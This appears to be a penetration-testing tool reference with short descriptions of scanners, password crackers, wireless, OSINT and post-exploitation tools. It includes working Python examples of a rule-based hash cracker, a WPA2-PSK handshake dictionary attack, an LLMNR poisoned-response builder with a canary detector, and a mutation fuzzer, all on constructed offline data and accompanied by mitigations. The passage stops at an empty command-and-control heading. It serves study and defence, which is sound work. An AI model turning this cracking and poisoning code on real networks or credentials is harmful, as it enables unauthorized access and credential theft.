Scanners
- Nmap: An open source network scanner used for network discovery and security auditing. It can discover hosts, scan TCP/UDP ports, enumerate service versions, fingerprint operating systems, and run Nmap Scripting Engine (NSE) scripts for vulnerability detection and further enumeration.
- Nikto: An open source web server scanner that searches for potentially harmful files, checks for outdated web server software, and looks for problems that occur with some web server software versions. It is included with Kali Linux.
- OpenVAS (Open Vulnerability Assessment System): An open source software framework for vulnerability scanning and management.
- SQLmap: An open source penetration testing tool that automates the detection and exploitation of SQL injection flaws and can go on to enumerate and dump database contents. It is included with Kali Linux.
- Nessus: A proprietary vulnerability scanner developed by Tenable (formerly Tenable Network Security). Initially open source, it scans for vulnerabilities, misconfigurations, default passwords, and susceptibility to denial of service (DoS) attacks, and its compliance checks can be used to prepare for PCI DSS audits.
Credential Testing Tools
- Hashcat: A free, open source password cracker included with Kali Linux and available for Linux, macOS, and Windows. It supports several hundred hash types and multiple attack modes (dictionary, rule-based, mask/brute-force, and hybrid), uses GPUs for acceleration, and is described by its developers as the world's fastest password cracker.
- Medusa: A free, command-line, modular login brute-forcer used for online password guessing against remote authentication services (SSH, FTP, HTTP, SMB, and others). It is thread-based and tests multiple hosts, users, and passwords in parallel; the project claims it can test roughly 2,000 passwords per minute against a local target. Unlike Hashcat and John the Ripper, it does not crack hashes offline.
- THC-Hydra: A free, parallelized network login cracker included with Kali Linux that performs online password guessing against a large number of authentication protocols (SSH, FTP, HTTP forms, SMB, RDP, databases, and more).
- CeWL: A Ruby application that spiders a website to a configurable depth and generates a word list (optionally including email addresses and document metadata) for use with password crackers such as John the Ripper and Hashcat. It is included with Kali Linux.
- John the Ripper: A free, open source password cracker available for Linux, many flavors of Unix (11 are officially supported), Windows, DOS, BeOS, and OpenVMS, and included with Kali Linux. It auto-detects common hash formats and offers single-crack, wordlist (with mangling rules), and incremental (brute-force) modes.
- Cain and Abel: A free, Windows-only password recovery tool that is no longer maintained. It combines network sniffing, cracking of captured and cached hashes, and ARP poisoning, and antivirus software commonly flags it as malware.
- Mimikatz: An open source Windows post-exploitation tool that extracts plaintext passwords, NTLM hashes, and Kerberos tickets from memory (chiefly the LSASS process) and supports pass-the-hash and pass-the-ticket attacks. It is included with Kali Linux and is also available as a Metasploit extension (kiwi).
- Patator: A modular, multi-purpose brute-forcer written in Python and included with Kali Linux that performs online guessing against SSH, FTP, SMTP, HTTP, SMB, databases, and other services; it was written as a more flexible alternative to Hydra and Medusa.
- Dirbuster: An OWASP multithreaded brute-force tool included with Kali Linux that discovers hidden directories and file names on web and application servers by requesting entries from a word list.
- W3AF (Web Application Attack and Audit Framework): A Python tool included with Kali Linux that identifies and exploits web application vulnerabilities.
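The offline crackers above (Hashcat, John the Ripper) spend most of their effort on the wordlist-plus-rules mode: each dictionary word is mangled by a small rule language before hashing, which is also why CeWL-generated site-specific words are valuable. The following is an added example written for this page, not code from Hashcat or John: it implements a subset of Hashcat's rule functions (`:`, `l`, `u`, `c`, `r`, `d`, `$X`, `^X`) and runs a rule-based dictionary attack against a constructed hash list. The usernames, hashes (unsalted SHA-256, chosen so the script runs offline) and wordlist are all made up.

```python
"""Offline rule-based dictionary attack in the style of Hashcat/John wordlist+rules mode.
Added example; not code from any of the tools listed above.  All data is constructed."""
import hashlib


def apply_rule(word: str, rule: str) -> str:
    """Apply a Hashcat-style rule string to one dictionary word.

    Supported functions (subset of https://hashcat.net/wiki/doku.php?id=rule_based_attack):
      :  no-op      l  lowercase   u  uppercase   c  capitalize
      r  reverse    d  duplicate   $X append X    ^X prepend X
    """
    i = 0
    while i < len(rule):
        op = rule[i]
        if op == ":":
            pass
        elif op == "l":
            word = word.lower()
        elif op == "u":
            word = word.upper()
        elif op == "c":
            word = word[:1].upper() + word[1:].lower()
        elif op == "r":
            word = word[::-1]
        elif op == "d":
            word = word + word
        elif op in "$^":
            i += 1
            if i >= len(rule):
                raise ValueError(f"rule {rule!r}: {op} needs an argument")
            word = word + rule[i] if op == "$" else rule[i] + word
        else:
            raise ValueError(f"unsupported rule function {op!r} in {rule!r}")
        i += 1
    return word


def sha256_hex(s: str) -> str:
    return hashlib.sha256(s.encode()).hexdigest()


def crack(hashlist, wordlist, rules) -> dict:
    """hashlist: iterable of 'user:sha256hex' lines.  Returns {user: recovered password}.

    Identical hashes are grouped so each candidate is hashed once, and the search
    stops as soon as every target has been recovered.
    """
    targets = {}
    for line in hashlist:
        user, _, digest = line.strip().partition(":")
        targets.setdefault(digest.lower(), []).append(user)
    found = {}
    for word in wordlist:
        for rule in rules:
            candidate = apply_rule(word, rule)
            digest = sha256_hex(candidate)
            if digest in targets:
                for user in targets.pop(digest):
                    found[user] = candidate
                if not targets:
                    return found
    return found


# Constructed sample data (hypothetical users; unsalted SHA-256 keeps the example offline).
WORDLIST = ["summer", "password", "acme", "welcome"]
RULES = [":", "c", "c$1", "c$2$0$2$4$!", "u", "r", "$1$2$3", "c^!"]
HASHLIST = [
    "alice:" + sha256_hex("Summer2024!"),   # 'summer' + rule c$2$0$2$4$!
    "bob:" + sha256_hex("password123"),     # 'password' + rule $1$2$3
    "carol:" + sha256_hex("ACME"),          # 'acme' + rule u
    "dave:" + sha256_hex("N0t1nTh3L1st"),   # not derivable from this wordlist/rules
]

if __name__ == "__main__":
    print(crack(HASHLIST, WORDLIST, RULES))
```

Real password stores are salted and use slow hashes (bcrypt, scrypt, PBKDF2), so the per-candidate cost, not the rule engine, dominates; that is the reason GPU acceleration and good wordlists matter more than raw brute force.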
Debuggers
- OllyDbg: A free assembler-level debugger for 32-bit Windows binaries, widely used for reverse engineering and exploit development. It is included with Kali Linux, where it runs under Wine.
- Immunity Debugger: A Windows debugger for exploit development and malware analysis that offers both a command-line and a graphical interface and exposes a Python API; Python scripts (such as mona.py) can be loaded and modified at runtime.
- GDB (GNU Project Debugger): The open source GNU debugger, available for most Unix-like systems, Windows, and macOS. It supports source- and assembly-level debugging and, with extensions such as GEF or pwndbg, is commonly used for exploit development on Linux.
- WinDbg (Windows Debugger): A free debugger from Microsoft for Windows that supports user-mode and kernel-mode debugging, including analysis of crash dumps.
- IDA (Interactive Disassembler): A commercial disassembler from Hex-Rays (a free edition exists) for Windows, macOS, and Linux that converts machine code into annotated assembly listings; the optional Hex-Rays decompiler produces C-like pseudocode. It does not recover the original source code.
Software Assurance Tools
- FindBugs and FindSecBugs: FindBugs is an open source static application security testing (SAST) tool that detects likely bugs in Java bytecode; it has since been succeeded by SpotBugs. Find Security Bugs (FindSecBugs) is an open source plugin for it that detects security issues in Java web applications.
- Peach: Peach Tech (acquired by GitLab in 2020) offered several dynamic application security testing (DAST) products, including Peach API Security, which tests web APIs against the OWASP Top 10, and Peach Fuzzer, an automated fuzzing platform. Within Peach Fuzzer, XML test definitions called Peach Pits describe the data model and state model of a target so that the generated test cases are tailored to it.
- AFL (American fuzzy lop): An open source, coverage-guided fuzzer. It instruments the target at compile time, mutates inputs through deterministic stages (bit and byte flips, arithmetic, interesting values) and a randomized "havoc" stage, keeps any input that reaches new code paths, and records inputs that crash or hang the program. It is now maintained as AFL++.
- SonarQube: An open source (Community Edition) SAST and code quality platform that continuously inspects code for bugs, code smells, and security vulnerabilities, usually as part of a CI pipeline.
- YASCA (Yet Another Source Code Analyzer): An open source SAST program that inspects source code for security vulnerabilities, code quality, and performance; it is itself a framework that can invoke other scanners (such as FindBugs and PMD) as plugins.
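To make the mutation-based fuzzing that AFL and Peach perform concrete, here is a minimal fuzzer written for this page (added example, not AFL's or Peach's code). It runs AFL's deterministic single-bit-flip stage and then a randomized havoc stage against a constructed target: a parser for length-prefixed records that trusts the declared length and so reads past the end of the buffer. Everything below, including the parser and its bug, is constructed for illustration; in a C target the same bug would be a heap over-read caught by AFL as a crash rather than a Python exception.

```python
"""Minimal mutation-based fuzzer modelled on AFL's bitflip and havoc stages.
Added example, not AFL's own code.  The target and its bug are constructed."""
import random


def parse_records(data: bytes) -> list:
    """Constructed target: a sequence of <1-byte length><payload> records.

    Bug: the declared length is trusted, so a record that claims to extend past
    the end of the buffer causes an out-of-range read (IndexError here).
    """
    records, i = [], 0
    while i < len(data):
        n = data[i]
        _ = data[i + n]                      # touches the record's last byte with no bounds check
        records.append(data[i + 1:i + 1 + n])
        i += 1 + n
    return records


def bit_flips(seed: bytes):
    """Deterministic stage: flip every single bit of the seed once (AFL's bitflip 1/1)."""
    for pos in range(len(seed)):
        for bit in range(8):
            out = bytearray(seed)
            out[pos] ^= 1 << bit
            yield bytes(out)


def havoc(seed: bytes, rng: random.Random, rounds: int):
    """Random stage: stack one to four byte-level mutations per test case."""
    interesting = [0, 1, 0x7F, 0x80, 0xFF]
    for _ in range(rounds):
        out = bytearray(seed)
        for _ in range(rng.randint(1, 4)):
            choice = rng.randrange(4)
            if choice == 0 and out:                       # overwrite a random byte
                out[rng.randrange(len(out))] = rng.randrange(256)
            elif choice == 1:                             # insert a random byte
                out.insert(rng.randrange(len(out) + 1), rng.randrange(256))
            elif choice == 2 and len(out) > 1:            # delete a byte
                del out[rng.randrange(len(out))]
            elif choice == 3 and out:                     # plant an "interesting" value
                out[rng.randrange(len(out))] = rng.choice(interesting)
        yield bytes(out)


def fuzz(target, seed: bytes, havoc_rounds: int = 500, rng_seed: int = 1) -> dict:
    """Run target on every mutant.  Returns {(exception type, message): first crashing input}.

    AFL buckets crashes by execution path; keying on exception type and message is
    the cheap stand-in used here.
    """
    rng = random.Random(rng_seed)             # fixed seed so a run is reproducible
    crashes = {}
    for case in list(bit_flips(seed)) + list(havoc(seed, rng, havoc_rounds)):
        try:
            target(case)
        except Exception as exc:              # AFL would observe a signal; here an exception
            crashes.setdefault((type(exc).__name__, str(exc)), case)
    return crashes


def reproduces(target, case: bytes) -> bool:
    """Re-run a saved crashing input; a crash that does not reproduce is a false positive."""
    try:
        target(case)
    except Exception:
        return True
    return False


SEED = b"\x05hello\x05world"   # constructed valid input: two 5-byte records

if __name__ == "__main__":
    for (kind, msg), case in fuzz(parse_records, SEED).items():
        print(f"{kind}: {msg!r}  <- {case!r}  reproduces={reproduces(parse_records, case)}")
```

The deterministic stage alone is enough to find this bug (flipping the high bit of the first length byte turns 5 into 133), which is typical: AFL's cheap deterministic passes catch many length and framing errors before the havoc stage starts. What this toy lacks is AFL's coverage feedback, which is what lets it reach bugs behind several layers of parsing rather than only those in the first field.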
OSINT Tools
- Whois: A query/response protocol (and command-line client) for looking up the registration records of Internet resources such as domain names, IP address blocks, and autonomous system numbers, including registrant contacts and name servers.
- Nslookup: A command-line utility available on Windows and Unix-like systems that queries DNS and displays name-to-address or address-to-name mappings, or other record types (MX, NS, TXT), depending on the options used.
- FOCA (Fingerprinting Organizations with Collected Archives): A Windows tool that locates documents on a target's web servers through search engines, downloads them, and analyzes their metadata to enumerate users, folders, software and OS versions, printers, and other network infrastructure details.
- theHarvester: A tool included with Kali Linux that gathers information such as email addresses, subdomains, host names, open ports, and banners from publicly available sources.
- Shodan: A search engine that returns information about the types of devices connected to the Internet by inspecting the metadata included in service banners.
- Maltego: A proprietary tool that assists with gathering open source intelligence (OSINT) and with forensics by collecting data through "transforms" and graphing the relationships between people, groups, websites, domains, networks, and applications. A community edition is included with Kali Linux, and Maltego Teeth is a set of penetration-testing transforms that was also packaged for Kali.
- Recon-ng: A modular web reconnaissance framework written in Python and included with Kali Linux. Its more than 80 modules automate OSINT tasks such as file discovery, host, contact, and email address enumeration, DNS cache snooping, VPN discovery, password hash lookups, and geolocation, with results stored in a local database for reporting.
- Censys: A search engine that continuously scans the public IPv4 address space and indexes hosts, the services they expose, and their TLS certificates, so that devices connected to the Internet can be queried by attribute.
Wireless Tools
- Aircrack-ng: A suite of wireless tools included with Kali Linux: airmon-ng (puts an adapter into monitor mode), airodump-ng (captures frames and handshakes), aireplay-ng (injects frames, for example deauthentication to force a new handshake), and aircrack-ng (the cracker). It can crack WEP keys statistically and recover WPA/WPA2-PSK passphrases by a dictionary attack against a captured four-way handshake.
- Kismet: An 802.11 Layer 2 wireless network detector, sniffer, and intrusion detection system included with Kali Linux. It passively monitors wireless activity, identifies access points, clients, and device types, and captures raw frames (including handshakes) for later analysis or cracking.
- WiFite: A wireless auditing tool included with Kali Linux that drives aircrack-ng and related tools to attack multiple WEP and WPA/WPA2 networks, and WPS-enabled access points, one after another with minimal interaction.
- WiFi-Pumpkin: A rogue access point and man-in-the-middle framework that lures clients onto an attacker-controlled network in order to sniff traffic and harvest credentials.
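The WPA/WPA2-PSK attack that aircrack-ng and WiFite run is a dictionary attack against the four-way handshake: for each candidate passphrase the PMK is derived with PBKDF2, the PTK is expanded from it with the two MACs and two nonces, and the key-confirmation key (KCK) is used to recompute the MIC on the captured EAPOL message; a match confirms the passphrase. The script below is an added example written for this page, not code from the aircrack-ng suite. Because it must run offline, the "captured" handshake is constructed from fixed MACs and nonces and a known passphrase; the SSID, addresses, and wordlist are made up. The derivation itself follows IEEE 802.11i (PBKDF2-HMAC-SHA1 with 4096 iterations, the "Pairwise key expansion" PRF, and HMAC-SHA1-128 for key descriptor version 2).

```python
"""WPA2-PSK dictionary attack against a 4-way handshake, as performed by aircrack-ng.
Added example, not aircrack-ng code.  The handshake below is constructed, not captured."""
import hashlib
import hmac
import struct


def pmk(passphrase: str, ssid: str) -> bytes:
    # IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    # 802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ...
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def ptk(pmk_: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PTK = PRF-384(PMK, "Pairwise key expansion", min(MACs) || max(MACs) || min(nonces) || max(nonces))
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk_, b"Pairwise key expansion", data, 48)   # KCK(16) | KEK(16) | TK(16) for CCMP


# 802.1X hdr(4) + descriptor(1) + key info(2) + key len(2) + replay(8) + nonce(32) + IV(16) + RSC(8) + ID(8)
MIC_OFFSET = 81


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    # Key descriptor version 2 (HMAC-SHA1-128): MIC over the frame with the MIC field zeroed
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes) -> bytes:
    """Constructed EAPOL-Key message 2/4 with an all-zero MIC field and no key data."""
    # RSN descriptor (2); key info 0x010A = version 2 | pairwise | MIC; key length 16; replay counter 1
    body = struct.pack(">BHHQ", 2, 0x010A, 16, 1)
    body += snonce + bytes(16) + bytes(8) + bytes(8) + bytes(16) + struct.pack(">H", 0)
    return struct.pack(">BBH", 1, 3, len(body)) + body   # 802.1X version 1, type 3 (EAPOL-Key)


def crack_wpa2(ssid, ap_mac, sta_mac, anonce, snonce, eapol, captured_mic, wordlist):
    """Return the first candidate whose derived KCK reproduces the captured MIC, else None."""
    for candidate in wordlist:
        kck = ptk(pmk(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol), captured_mic):
            return candidate
    return None


# Constructed handshake (hypothetical network, fixed nonces, known passphrase).
SSID = "CorpGuest"
AP_MAC = bytes.fromhex("00112233aabb")
STA_MAC = bytes.fromhex("66778899ccdd")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
EAPOL = build_eapol_msg2(SNONCE)
TRUE_PASSPHRASE = "sunflower99"
CAPTURED_MIC = eapol_mic(ptk(pmk(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16], EAPOL)
WORDLIST = ["password", "letmein", "sunflower", "sunflower99", "CorpGuest2024"]

if __name__ == "__main__":
    print(crack_wpa2(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL, CAPTURED_MIC, WORDLIST))
```

The 4096-round PBKDF2 step is the cost that bounds the attack, and since the PMK depends only on the passphrase and SSID, precomputed tables work against common SSIDs; that is the design reason a unique SSID and a long passphrase matter, and why WPA3's SAE removed this offline attack.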
Web Proxy Tools
- OWASP ZAP (Zed Attack Proxy): An open source intercepting proxy and web application security scanner that originated as an OWASP flagship project; it is included with Kali Linux.
- Burp Suite: An integrated platform for web application security testing; the Community edition is included with Kali Linux. Acting as a local intercepting proxy, it lets the tester capture, analyze, replay, and manipulate HTTP(S) traffic between the browser and the target application.
Social Engineering Tools
- SET (Social-Engineer Toolkit): An open source pen testing framework included with Kali Linux that automates social engineering attacks, such as spear-phishing emails, cloned credential-harvesting websites, and malicious payloads, to penetrate a network or system.
- BeEF (Browser Exploitation Framework): A pen testing tool included with Kali Linux that targets web browsers. Once a browser is "hooked" (typically by injecting the hook script through an XSS flaw), BeEF can run command modules against it, such as fingerprinting, credential phishing dialogs, and launching further attacks from the victim's browser.
Remote Access Tools
- SSH (Secure Shell): A protocol, and the client and server programs that implement it, that lets a user or application log on to another device over an encrypted and authenticated connection, run commands on the remote machine, transfer files (scp, sftp), and tunnel other traffic through port forwarding.
- Ncat: An open source command-line tool from the Nmap project for reading, writing, redirecting, and encrypting data across a network. Written as a modernized replacement for Netcat, it adds TLS, proxy support, IPv6, and connection access control.
- Netcat: An open source networking utility for debugging and investigating networks. It creates arbitrary TCP and UDP connections and listeners, and is commonly used for banner grabbing, file transfer, and setting up bind or reverse shells.
- Proxychains: A command-line tool included with Kali Linux and available for other Linux distributions that forces TCP connections from any program through a chain of SOCKS or HTTP proxies (including Tor), letting pen testers mask their source IP address and pivot through intermediary hosts.
Networking Tools
- Wireshark: An open source network protocol analyzer included with Kali Linux. It captures and dissects hundreds of protocols, follows and reassembles entire TCP streams, and can export files (such as HTTP objects) transmitted on the network.
- hping: A free command-line packet generator and analyzer for TCP/IP that crafts custom TCP, UDP, ICMP, and raw IP packets. It is often used for firewall testing, traceroute-style probing, and advanced port scanning; hping3 is included with Kali Linux.
Mobile Tools
- Drozer: A security testing framework for Android apps and devices that interacts with applications through Android's IPC mechanisms (activities, content providers, services, and broadcast receivers) to find exported and exploitable components.
- APKX: A Python wrapper around dex converters (dex2jar, enjarify) and Java decompilers (CFR, Procyon) that extracts and decompiles Android APKs; it is documented in the OWASP Mobile Security Testing Guide.
- APK Studio: A cross-platform IDE for reverse engineering Android applications, combining decoding, editing, and rebuilding of APKs in one interface.
Miscellaneous Tools
- Searchsploit: A command-line tool included in the exploitdb package on Kali Linux that searches an offline copy of the Exploit Database archive.
- PowerSploit: A collection of Microsoft PowerShell modules for post-exploitation, covering code execution, persistence, privilege escalation, reconnaissance, exfiltration, and antivirus bypass. It is included in Kali Linux.
- Responder: A rogue server and relay tool included with Kali Linux. It answers LLMNR, NBT-NS, and mDNS name queries to poison name resolution and capture NTLMv1/v2 challenge-response hashes, and it runs fake services (HTTP, SMB, MSSQL, FTP, LDAP, POP3, IMAP, SMTP) to harvest user names and passwords.
- Impacket: A collection of Python classes that provide low-level programmatic access to network packets and to protocol implementations such as SMB, MSRPC, Kerberos, and LDAP. Its example scripts (for instance psexec.py, secretsdump.py, and GetNPUsers.py) are widely used in Windows network pen testing.
- Empire (PowerShell Empire): A post-exploitation framework for Windows that runs PowerShell agents without needing powershell.exe. It is commonly used to escalate privileges, run modules that capture data and extract passwords, and install persistent backdoors. The original project was archived in 2019 and is maintained as a fork by BC-Security.
- Metasploit Framework: A command-line pen testing framework developed by Rapid7 and included with Kali Linux that enables you to find, exploit, and validate vulnerabilities. Metasploit Pro is the commercial, GUI-based version, and Armitage is a free GUI front end for the framework.
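Responder's core trick is simple at the protocol level: LLMNR (RFC 4795, UDP port 5355, multicast 224.0.0.252) uses the DNS wire format, a Windows host that fails to resolve a name broadcasts a query, and any host on the segment may answer. The following is an added example written for this page, not Responder's code: it builds the victim's query, builds the poisoned answer that copies the query's transaction ID and name and points it at the attacker, parses both, and includes the defender-side check (query a canary name that does not exist; any answer reveals a poisoner). No traffic is sent; the packets are constructed and the addresses and names are hypothetical.

```python
"""LLMNR query/response construction and poisoning (RFC 4795), plus a canary check.
Added example, not Responder's code.  All packets and addresses are constructed."""
import socket   # used only for IPv4 address conversion; nothing is sent
import struct

LLMNR_PORT = 5355
LLMNR_GROUP = "224.0.0.252"


def encode_name(name: str) -> bytes:
    """DNS-style label encoding: length-prefixed labels, terminated by a zero byte."""
    return b"".join(bytes([len(label)]) + label.encode() for label in name.split(".")) + b"\x00"


def decode_name(pkt: bytes, off: int):
    """Decode an uncompressed name starting at off; return (name, offset after the name)."""
    labels = []
    while True:
        n = pkt[off]
        off += 1
        if n == 0:
            return ".".join(labels), off
        labels.append(pkt[off:off + n].decode())
        off += n


def build_query(txid: int, name: str, qtype: int = 1) -> bytes:
    """Victim side: the query a Windows host multicasts after DNS fails to resolve `name`."""
    header = struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0)   # ID, flags (QR=0), QD=1, AN=NS=AR=0
    return header + encode_name(name) + struct.pack(">HH", qtype, 1)   # QCLASS IN


def parse(pkt: bytes) -> dict:
    """Parse an LLMNR query or response into its header fields, question, and A answers."""
    txid, flags, qd, an, ns, ar = struct.unpack(">HHHHHH", pkt[:12])
    name, off = decode_name(pkt, 12)
    qtype, qclass = struct.unpack(">HH", pkt[off:off + 4])
    off += 4
    answers = []
    for _ in range(an):
        aname, off = decode_name(pkt, off)
        atype, aclass, ttl, rdlen = struct.unpack(">HHIH", pkt[off:off + 10])
        rdata = pkt[off + 10:off + 10 + rdlen]
        off += 10 + rdlen
        answers.append((aname, atype, ttl, rdata))
    return {"id": txid, "response": bool(flags & 0x8000), "name": name,
            "qtype": qtype, "answers": answers}


def build_poisoned_response(query: bytes, attacker_ip: str, ttl: int = 30) -> bytes:
    """Attacker side: answer any A query with the attacker's address.

    Responder does not care what the name is; it echoes the victim's transaction ID
    and question so the client accepts the answer, then waits for the victim to
    authenticate (for example over SMB) to the attacker's address.
    """
    q = parse(query)
    if q["response"] or q["qtype"] != 1:
        raise ValueError("not an A-record LLMNR query")
    header = struct.pack(">HHHHHH", q["id"], 0x8000, 1, 1, 0, 0)   # QR=1, one question, one answer
    question = encode_name(q["name"]) + struct.pack(">HH", 1, 1)
    answer = encode_name(q["name"]) + struct.pack(">HHIH", 1, 1, ttl, 4) + socket.inet_aton(attacker_ip)
    return header + question + answer


def canary_detect(pkt: bytes, canary_name: str):
    """Defender side: a canary name that exists nowhere on the network must never be
    answered, so any A answer to it identifies a poisoner.  Returns its IP or None."""
    p = parse(pkt)
    if p["response"] and p["name"].lower() == canary_name.lower():
        for _, atype, _, rdata in p["answers"]:
            if atype == 1 and len(rdata) == 4:
                return socket.inet_ntoa(rdata)
    return None


if __name__ == "__main__":
    # Constructed exchange: victim mistypes a share name, attacker at 10.0.0.66 answers.
    query = build_query(0x1234, "filesrv01")
    reply = build_poisoned_response(query, "10.0.0.66")
    print(parse(query))
    print(parse(reply))
    print("poisoner:", canary_detect(reply, "filesrv01"))
```

The mitigation follows from the exchange: disabling LLMNR and NBT-NS on clients removes the query altogether, and enforcing SMB signing prevents the captured authentication from being relayed even when the poison succeeds.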
Command & Control Servers